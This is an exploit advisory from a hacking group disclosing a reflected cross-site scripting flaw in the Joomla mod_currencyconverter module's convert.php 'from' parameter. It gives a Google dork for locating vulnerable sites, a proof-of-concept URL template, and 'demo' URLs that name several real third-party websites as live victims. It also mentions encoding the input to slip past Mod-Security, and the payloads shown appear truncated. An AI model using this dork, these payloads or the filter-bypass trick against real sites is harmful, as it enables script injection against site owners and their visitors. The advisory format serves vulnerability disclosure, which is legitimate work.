# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
# Date: 2012-02-02 [GMT +7]
# Author: BHG Security Center
# Software Link: http://joomla.org
# Dork: inurl:/includes/convert.php?from=
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
Joomla modules (mod_currencyconverter) XSS Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-02-02
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
------------- ( Cross Site Scripting ) ~
~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
------------- ( Demo Vulnerability ) ~
Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from=">
Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>>
Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>>
Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from=">
Note: URL encoded GET input aonvert.php?from= was set to '>> [For Bypass Mod-Security]
Timeline:
~~~~~~~~~
- 29 - 01 - 2012 bug found.
- 01 - 02 - 2012 vendor contacted, but no response.
- 02 - 02 - 2012 Advisories release.
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | Cru3l.b0y | ArYaIeIrAN | NoL1m1t | G3n3Rall
Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | md.r00t And All My Friendz
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [Pentesters.ir] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------